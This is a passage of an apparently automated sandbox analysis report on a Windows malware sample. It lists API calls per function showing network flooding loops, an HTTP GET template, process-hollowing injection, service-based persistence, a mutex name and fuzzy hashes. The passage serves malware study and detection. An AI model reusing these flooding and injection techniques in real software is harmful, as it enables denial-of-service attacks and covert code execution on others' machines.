      • htons.WS2_32(00000100), ref: 004038B3
      • htons.WS2_32(00000001), ref: 004038BC
      • htons.WS2_32(00000001), ref: 004038D6
      • htons.WS2_32(00000001), ref: 004038DF
      • sendto.WS2_32(?,?,0000000C,00000000,?,00000010), ref: 004039EA
      • Sleep.KERNEL32(?), ref: 004039F7
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: htons$CountSleepTickgethostbynameinet_addrrandsendtosocketsrand
      • String ID: com$www
      • API String ID: 3135813497-1875102311
      • Opcode ID: 5ea3f0c954bce6c043580af0d019b7d28d9a68b9ec05717201942eee02f591bf
      • Instruction ID: a346ce78095f23929a5207854ff3f73bc1995c101e3e6ceadca4775150165a56
      • Opcode Fuzzy Hash: 5ea3f0c954bce6c043580af0d019b7d28d9a68b9ec05717201942eee02f591bf
      • Instruction Fuzzy Hash: 4E517E716183809AD710DF68D941B5BBBE4FF98704F00093EF685AB391D6B5D608CB5B
      APIs
      • htons.WS2_32 ref: 00404368
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • wsprintfA.USER32 ref: 004043B0
      • socket.WS2_32(00000002,00000001,00000006), ref: 004043E5
      • connect.WS2_32(00000000,?,00000010), ref: 004043F5
      • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 00404412
      • setsockopt.WS2_32(00000000,0000FFFF,00001001,?,00000004), ref: 00404426
      • send.WS2_32(00000000,?,?,00000000), ref: 00404444
      • Sleep.KERNEL32(00000001,?,00000000), ref: 0040444C
      • closesocket.WS2_32(00000000), ref: 00404452
      • Sleep.KERNEL32(?,?,00000000), ref: 0040445E
      Strings
      • GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive, xrefs: 004043AA
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleepsetsockopt$closesocketconnectgethostbynamehtonsinet_addrsendsocketwsprintf
      • String ID: GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive
      • API String ID: 3772806076-3649629926
      • Opcode ID: e254d7ecfb8d5bdaad4f922df4774619181c4e6b67251d8f5c82b1103925ef45
      • Instruction ID: cc7d46b8f8966c664a06a087e703ee97f12425e3e4b14521f3d6c012654d40f7
      • Opcode Fuzzy Hash: e254d7ecfb8d5bdaad4f922df4774619181c4e6b67251d8f5c82b1103925ef45
      • Instruction Fuzzy Hash: 7A31B2B12043016EE310DB64DD45FAB77E4EF88714F004A39F685B62D2DBB5DA148B9A
      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00401A3B
      • OpenServiceA.ADVAPI32(00000000,PCIDump,00000010), ref: 00401A4F
      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401A5C
      • puts.MSVCRT ref: 00401A6B
      • CreateFileA.KERNEL32(\\.\Dark2118,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00401A89
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401A98
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401A9B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Service$CloseHandleOpen$CreateFileManagerStartputs
      • String ID: PCIDump$Start beep service ok$\\.\Dark2118
      • API String ID: 1337555625-3442187310
      • Opcode ID: b6e561f11e318ee7e2f33fc7c7b3acf07a8769b9ac446392d875949841eed154
      • Instruction ID: a47457c5b07d48301e3edaf03b4678802010fc7bcf1038e17df538a0db3eeae7
      • Opcode Fuzzy Hash: b6e561f11e318ee7e2f33fc7c7b3acf07a8769b9ac446392d875949841eed154
      • Instruction Fuzzy Hash: C8F062317C23107BF13057297E0AF5A66589BC5F61F260136FB02FA2D1CAF56811457D
      APIs
        • Part of subcall function 00404F50: CreateProcessA.KERNEL32 ref: 00404F95
        • Part of subcall function 00404F50: GetThreadContext.KERNEL32(?,?,?,00000000), ref: 00404FDF
        • Part of subcall function 00404F50: ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?), ref: 00405001
        • Part of subcall function 00404F50: VirtualQueryEx.KERNEL32(?,?,00000000,0000001C), ref: 00405014
      • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000000,00000040,?,00000000,00000000,00000000), ref: 004050DC
      • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?,?,?,00000000,00000000,00000000), ref: 0040518E
      • WriteProcessMemory.KERNEL32(?,00000000,?,?,?), ref: 004051A4
      • SetThreadContext.KERNEL32(?,00010007), ref: 004051E5
      • ResumeThread.KERNEL32(?), ref: 004051F0
      • CloseHandle.KERNEL32(?), ref: 00405201
      • CloseHandle.KERNEL32(?), ref: 00405208
      • TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00405222
      • CloseHandle.KERNEL32(?), ref: 00405233
      • CloseHandle.KERNEL32(?), ref: 0040523A
      • CloseHandle.KERNEL32(?), ref: 00405249
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: CloseHandleProcess$MemoryThread$ContextVirtualWrite$CreateProtectQueryReadResumeTerminate
      • String ID:
      • API String ID: 1172303993-0
      • Opcode ID: 623d831c4799a319580453fe82b860b5df37d76266bbcd616d2ff9953a9d5461
      • Instruction ID: 141aa6610cd99cb5175e9e9bd0261924da27ba30c832803be0871d0b99e0ff5c
      • Opcode Fuzzy Hash: 623d831c4799a319580453fe82b860b5df37d76266bbcd616d2ff9953a9d5461
      • Instruction Fuzzy Hash: 5D511AB1604306AFD714DF54D984E6BB7E8FBC8704F00492EF695A7280D734E9098FAA
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
      • String ID:
      • API String ID: 801014965-0
      • Opcode ID: 3de23573ef1715b9a8928f26ab0e8641acaccc1afddd6fa0509801181ce18bb7
      • Instruction ID: 08c3d47bc78690a4692016e01a4053327b0450060358d7bde467d7ce67411583
      • Opcode Fuzzy Hash: 3de23573ef1715b9a8928f26ab0e8641acaccc1afddd6fa0509801181ce18bb7
      • Instruction Fuzzy Hash: 10415EB5840744DFDB20EFA5D945AAA7BB8FB09720F20453BE942B7292C7385850CF59
      APIs
      • htons.WS2_32 ref: 00403A5B
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000000), ref: 00403A8A
      • connect.WS2_32(00000000,?,00000010), ref: 00403A9A
      • sprintf.MSVCRT ref: 00403B0F
      • send.WS2_32(00000000,?,?,00000000), ref: 00403B2F
      • Sleep.KERNEL32(?,?,00000000), ref: 00403B41
      • closesocket.WS2_32(00000000), ref: 00403B55
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • closesocket.WS2_32(00000000), ref: 00403B7B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: closesocket$CountSleepTickconnectgethostbynamehtonsinet_addrrandsendsocketsprintfsrand
      • String ID: #%d<<<<<I@C<<<<<%s!
      • API String ID: 2412321289-2252867878
      • Opcode ID: d2661d546bbe370dccfce10274fdb1bc706107758e247911a729c7ef5c8e7780
      • Instruction ID: 757bc92c44c000d424731bf525e197106d9849695528a586ad82f3115cc63796
      • Opcode Fuzzy Hash: d2661d546bbe370dccfce10274fdb1bc706107758e247911a729c7ef5c8e7780
      • Instruction Fuzzy Hash: 61312C717003005BE3109F68DD45BAB77D8EB84711F000A3EF556F62D2DBB9DA5487AA
      APIs
      • CreateMutexA.KERNEL32(00000000,00000000,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,?,00000000), ref: 00402323
      • GetLastError.KERNEL32(?,00000000), ref: 0040232B
      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402339
      • WSAStartup.WS2_32(00000202,?), ref: 00402354
      • CreateThread.KERNEL32(00000000,00000000,004023A0,00000000,00000000,00000000), ref: 0040237B
      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00402382
      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402385
      • Sleep.KERNEL32(00002710,?,00000000), ref: 0040238C
      Strings
      • O5WGU2RYGMXDGMZSGIXG64THHI4DG===, xrefs: 0040231A
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: CloseCreateHandle$ErrorLastMutexObjectSingleSleepStartupThreadWait
      • String ID: O5WGU2RYGMXDGMZSGIXG64THHI4DG===
      • API String ID: 3243752880-1710454822
      • Opcode ID: 40503449b649fef1bd0270346f8e5b0dffe0f7ca521dd074fbf107b19bcd37d6
      • Instruction ID: f0887902d8799ec79f41d18c9017bde5b9cb0edae3060649d4a43c805d283ee9
      • Opcode Fuzzy Hash: 40503449b649fef1bd0270346f8e5b0dffe0f7ca521dd074fbf107b19bcd37d6
      • Instruction Fuzzy Hash: C1F062312C4320BBF220A760AE0EF9A3798EB45761F620132FB16B61D086BD6925856D
      APIs
      • RegisterServiceCtrlHandlerA.ADVAPI32(WinH83,004020E0), ref: 00401FBE
      • SetServiceStatus.ADVAPI32(00000000,00409B00), ref: 00401FE5
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040204E
      • ExitProcess.KERNEL32 ref: 0040208D
        • Part of subcall function 00401030: GetSystemDirectoryA.KERNEL32(?,00000040), ref: 0040103F
      • GetCurrentProcess.KERNEL32(00004000,?,?,?), ref: 0040209D
      • SetPriorityClass.KERNEL32(00000000), ref: 004020A4
        • Part of subcall function 00402310: CreateMutexA.KERNEL32(00000000,00000000,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,?,00000000), ref: 00402323
        • Part of subcall function 00402310: GetLastError.KERNEL32(?,00000000), ref: 0040232B
        • Part of subcall function 00402310: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402339
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: ProcessService$ClassCloseCreateCtrlCurrentDirectoryErrorExitFileHandleHandlerLastModuleMutexNamePriorityRegisterStatusSystem
      • String ID: WinH83
      • API String ID: 1658639894-961809781
      • Opcode ID: 4ee55938119c28e4f73666206572570f15b1761e54eab9b4a49128cb3a0eb2af
      • Instruction ID: 9642478b6596cb6bc20c0ea93c2b3dc97e5bca214b4293dff6f279fa1b332622
      • Opcode Fuzzy Hash: 4ee55938119c28e4f73666206572570f15b1761e54eab9b4a49128cb3a0eb2af
      • Instruction Fuzzy Hash: D8318DB1544340ABD310EF10EE49B9A77B8BB84B24F00493EF255B21E1C7B85944CFAA
      APIs
      • CloseHandle.KERNEL32(?), ref: 00401AB9
      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00401AC5
      • OpenServiceA.ADVAPI32(00000000,PCIDump,00010020), ref: 00401ADE
      • ControlService.ADVAPI32(00000000,00000001,?), ref: 00401AF8
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401AFF
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401B02
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Service$CloseHandle$Open$ControlManager
      • String ID: PCIDump
      • API String ID: 221034970-2760668468
      • Opcode ID: d3f51e32179601bd6bd385f92349c8e65cf1fd802eb3f5bc66244932cf849bfe
      • Instruction ID: ad2f3aa41601f700f468a5a7830ac414b64389455abcdf9db4cbc2565e09f406
      • Opcode Fuzzy Hash: d3f51e32179601bd6bd385f92349c8e65cf1fd802eb3f5bc66244932cf849bfe
      • Instruction Fuzzy Hash: 48F0E2326813107BE122EB289D8AF6F7A38EF88B51F010024FA0672291DB74981186A9
      APIs
      • WSAStartup.WS2_32(00000202,?), ref: 00403453
      • WSASocketA.WS2_32 ref: 0040346D
      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 004034A0
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: SocketStartupsetsockopt
      • String ID:
      • API String ID: 3631403553-0
      • Opcode ID: e1dcf5baf38bc8b48eae98141d4a7c83cceea2be991cffbceb56b85ab6e853a1
      • Instruction ID: 226e03a2150bb59f1e7f6b3c1f6d9c6eb840beed862f8ec42d854958baf2facb
      • Opcode Fuzzy Hash: e1dcf5baf38bc8b48eae98141d4a7c83cceea2be991cffbceb56b85ab6e853a1
      • Instruction Fuzzy Hash: 6241D8716443006AE3109F64DC45B5BB7E8EF8C724F00493EFA45FB2D1E6759A04875A
      APIs
      • htons.WS2_32 ref: 00403737
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 00403770
      • connect.WS2_32(00000000,?,00000010), ref: 0040377C
      • setsockopt.WS2_32 ref: 0040379C
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • send.WS2_32(00000000,?,00000000,00000000), ref: 004037E1
      • Sleep.KERNEL32(?), ref: 004037FC
      • closesocket.WS2_32(00000000), ref: 0040380C
      • Sleep.KERNEL32(?), ref: 00403818
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleep$CountTickclosesocketconnectgethostbynamehtonsinet_addrrandsendsetsockoptsocketsrand
      • String ID:
      • API String ID: 526411511-0
      • Opcode ID: 444a2075ad8941576596289908408714f768e301d8c063e47ccbfb94edac868b
      • Instruction ID: 392376a69a85ddd6a41fefe85f27db82272ddffc380eaf5d6d57f244aef9ba4d
      • Opcode Fuzzy Hash: 444a2075ad8941576596289908408714f768e301d8c063e47ccbfb94edac868b
      • Instruction Fuzzy Hash: 7D31C8B17403416BE7009B65DD46FAB77E8EB88700F00843DF645EB3D1E6B8D9148B6A
      APIs
      • htons.WS2_32 ref: 00403BC7
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403C06
      • connect.WS2_32(00000000,?,00000010), ref: 00403C16
      • closesocket.WS2_32(00000000), ref: 00403C22
      • send.WS2_32(00000000,?,00000000), ref: 00403C6A
      • Sleep.KERNEL32(?,?,00000000), ref: 00403C77
      • closesocket.WS2_32(00000000), ref: 00403C80
      • Sleep.KERNEL32(?,?,00000000), ref: 00403C8D
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleepclosesocket$connectgethostbynamehtonsinet_addrsendsocket
      • String ID:
      • API String ID: 1592164743-0
      • Opcode ID: 6338840cde0a2a7df0f9744fb7fc18c33f45636636b2eddbddb7982ae8ac7723
      • Instruction ID: 54006a430e523e054915d6eeed30a28e789cf4b120cc542b5afca5d7f0e37e33
      • Opcode Fuzzy Hash: 6338840cde0a2a7df0f9744fb7fc18c33f45636636b2eddbddb7982ae8ac7723
      • Instruction Fuzzy Hash: C92128716043006BE3009F25ED41B6B77E8EB88710F004939F655FB2E2D679DA50CB9D
      APIs
      • htons.WS2_32 ref: 00404608
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 0040463F
      • connect.WS2_32(00000000,?,00000010), ref: 0040464F
      • send.WS2_32(00000000,00408A7C,00000000,00000000), ref: 0040466A
      • Sleep.KERNEL32(?), ref: 00404678
      • closesocket.WS2_32(00000000), ref: 00404681
      • Sleep.KERNEL32(0000001E), ref: 00404689
      • closesocket.WS2_32(00000000), ref: 004046A1
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleepclosesocket$connectgethostbynamehtonsinet_addrsendsocket
      • String ID:
      • API String ID: 1592164743-0
      • Opcode ID: 5eebb4bd4fb58d615f5178da3257558304f254ebf4d24a63fe7bd5c24358b5b7
      • Instruction ID: 52552667529c1c02b845fd8a5a2af135eee2e5d9a0b5595cc109e900984e1983
      • Opcode Fuzzy Hash: 5eebb4bd4fb58d615f5178da3257558304f254ebf4d24a63fe7bd5c24358b5b7
      • Instruction Fuzzy Hash: EB21C9712003005BE300DF79AD45B6B77D8EF85320F00493AF655E62E2E779D9558BAD
      APIs
      • htons.WS2_32(?), ref: 004035FB
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 00403634
      • setsockopt.WS2_32 ref: 00403652
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • sendto.WS2_32(00000000,?,00000000,00000000,?,00000010), ref: 004036A1
      • Sleep.KERNEL32(?), ref: 004036BC
      • closesocket.WS2_32(00000000), ref: 004036CC
      • Sleep.KERNEL32(?), ref: 004036D8
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleep$CountTickclosesocketgethostbynamehtonsinet_addrrandsendtosetsockoptsocketsrand
      • String ID:
      • API String ID: 1041160085-0
      • Opcode ID: 8a1cc530a81bfc68c490b0e3cc263bfa586558bb8acf8600ee6311d4aa21e5e8
      • Instruction ID: 989c941252648da03f0e755ab53e95e2a6e75eaf6f0a8efd28d51292b3b26e67
      • Opcode Fuzzy Hash: 8a1cc530a81bfc68c490b0e3cc263bfa586558bb8acf8600ee6311d4aa21e5e8
